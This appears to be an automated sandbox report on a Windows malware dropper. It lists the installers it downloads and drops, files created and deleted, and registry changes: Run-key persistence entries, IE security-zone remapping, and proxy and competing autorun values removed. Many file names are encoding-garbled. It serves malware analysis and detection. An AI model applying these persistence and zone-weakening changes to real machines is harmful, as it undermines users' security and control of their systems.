The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\s[2].js (3960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\xkna_50091167828[1].exe (627004 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\softcount[1].htm (109 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\setup_2948-140896[1].exe (1118776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\axuls[1].exe (52983 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\pic[1].gif (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\popup[1].htm (627 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\popup7o[2].js (8 bytes)
%Program Files%\fjwyusp\axult.exe (53796 bytes)
%Program Files%\fjwyusp\-1303_1_td.exe (30482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\axult[1].exe (56481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\core[1].php (752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\a-zm-157391-v5[1].exe (304039 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Program Files%\fjwyusp\IFoxInstall-y-c203945859-run-s-x.exe (181646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\IFoxInstall-y-c203945859-run-s-x[1].exe (184025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\pwc[1].htm (1048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\popup7o[1].js (3 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\stat[1].gif (43 bytes)
%Program Files%\fjwyusp\xkcc_50091167828.exe (561484 bytes)
%Program Files%\fjwyusp\axuls.exe (51909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\s[1].js (3380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\-1303_1_td[1].exe (33209 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=gb2312&cdo=-1&tsr=172&tlm=1352217204&tcn=1410999396&tpr=1410999395508&dpt=none&coa=&baidu_ (319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\stat[1].php (5114 bytes)
%Program Files%\fjwyusp\setup_2948-140896.exe (1064854 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (251 bytes)
%Program Files%\fjwyusp\pwc.dll (1 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2340 bytes)
%Program Files%\fjwyusp\a-zm-157391-v5.exe (289171 bytes)
The Dropped deletes the following file(s):
%Program Files%\fjwyusp\pwc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\popup7o[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\s[1].js (0 bytes)
The process axuls.exe:1160 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\fjwyusp\hzsoft\htop_x.exe (293112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\htop_x[1].exe (317913 bytes)
%Program Files%\fjwyusp\hzsoft\sjss_jing_zhimeng_217.exe (151302 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\apples_5_1008[1].exe (342852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\sjss_jing_zhimeng_217[1].exe (155529 bytes)
%Program Files%\fjwyusp\hzsoft\tqrl_89_177560.exe (793877 bytes)
%Program Files%\fjwyusp\hzsoft\apples_5_1008.exe (319897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\tqrl_89_177560[1].exe (838270 bytes)
The process ignite.exe:2576 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (26 bytes)
The process ignite.exe:2880 makes changes in the file system.
The Dropped deletes the following file(s):
%System%\config\systemprofile\Local Settings\Temp\~DF8AF9.tmp (0 bytes)
The process ignite.exe:2764 makes changes in the file system.
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF6CF0.tmp (0 bytes)
The process Application Dataypfbyfgmr.exe:2796 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-G9VJJ.tmp\Application Dataypfbyfgmr.tmp (6356 bytes)
The process iApple.exe:1748 makes changes in the file system.
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe (0 bytes)
The process apples_5_1008.exe:816 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Skin\AppleDesktopSkin.skn (8184 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\uninst.exe (1299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\mini.exe (13368 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleDCR.xml (1 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Skin\AppleDefaultSkin.skn (22 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\AppleDTShellExt64.dll (11048 bytes)
%Documents and Settings%\%current user%\Desktop\苹果桌面.lnk (976 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\AppleHelper.exe (21216 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleROCfg.ini (23 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\苹果桌面\苹果桌面.lnk (992 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\AppleDTShellExt.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\focuslogo.png (5 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\AppleDesktop.exe (59286 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleROData.dat (6 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\bg_header1.png (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Æ»¹û×ÀÃæ\öÃâ€ÃƒËœ Æ»¹û×ÀÃæ.lnk (785 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_min_2.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_min_1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\dshow.exe (1856 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\AppleDTAssistant.exe (16288 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_2.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_3.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw2.tmp (106535 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleSC.json (8 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (0 bytes)
The process tqrl_89_177560.exe:1644 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÃÂÇï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\tjapis[1].htm (91 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-áÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (138023 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Æßæ½Ú.png (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-áѩתÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂû·ÑÕß.png (706 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Àö¯½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýæ.png (1 bytes)
%Documents and Settings%\%current user%\Templates\1820149\YYM_955WD30.gif (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÃÂÂ.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-áѩ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÃÂÄî.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Desktop\天启日历.lnk (909 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\天启日历\天启日历.lnk (921 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Math.dll (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÃÂÓêת´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÃÂѩת´óÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\tj.html (91 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂÂÃâ€ÃƒÂ¶Ã‚±Â¸ÃÂü.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054ÃŽÃÂ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê áÓêתÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ãâ€Ã‚ªÃÂü½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ã¶÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\天启日历\配置\Uninstall.lnk (922 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (0 bytes)
%Program Files%\fjwyusp\success (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\tj.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Base64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\md5dll.dll (0 bytes)
The process xkcc_50091167828.exe:2196 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Dataypfbyfgmr.exe (12288 bytes)
Registry activity
The process fm4.exe:260 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"Publisher" = "音乐FM"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayIcon" = "%Program Files%\FM4.0\201409180317\Unins.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayName" = "音乐FM"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayVersion" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"UninstallString" = "%Program Files%\FM4.0\201409180317\Unins.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D AC 69 C6 A5 50 00 1E 2F BD 41 88 68 1B 80 80"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\FM4.0]
"RD" = "_201409180317"
The Dropped modifies IE settings for security zones to map all local web nodes that have no dots in their names and are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To run itself automatically each time Windows boots, the Dropped adds the following value, which points to its file, to the registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FM4.0_201409180317" = "%Program Files%\FM4.0\201409180317\fm4.exe -mini"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run itself automatically each time Windows boots, the Dropped adds the following value, which points to its file, to the registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FM4.0_News_201409180317" = "%Program Files%\FM4.0\201409180317\fm4svr.exe -mini"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
The Dropped disables automatic startup of the application by deleting the following autorun values:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BoxNews"
"FM4.0_News"
"FM4.0"
"YyfmPlay"
The process Almanac_clnh_2014.8.3._126cl.exe:2900 makes changes in the system registry.
